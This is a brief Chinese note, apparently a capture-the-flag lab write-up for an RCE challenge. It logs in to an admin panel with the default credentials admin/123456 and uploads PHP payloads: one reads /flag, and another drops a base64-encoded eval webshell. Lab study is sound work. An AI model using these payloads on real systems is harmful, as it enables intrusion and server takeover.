UID: 20240531112442
created: 2024-05-31 11:24
tags:
- 春秋云镜
漏洞类型:
- RCE
dg-publish:
- "true"
- 访问后台/admin 弱口令登录 admin 123456
- 尝试访问漏洞目录,发现无法访问

- 怀疑是没有文件。在后台上传一个马儿
- 正常的马儿上传不了。
- 上传
<?php system('cat /flag');phpinfo();?>

- 或者写入
<?php
file_put_contents('a.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbYV0pOz8+'));
phpinfo();
?>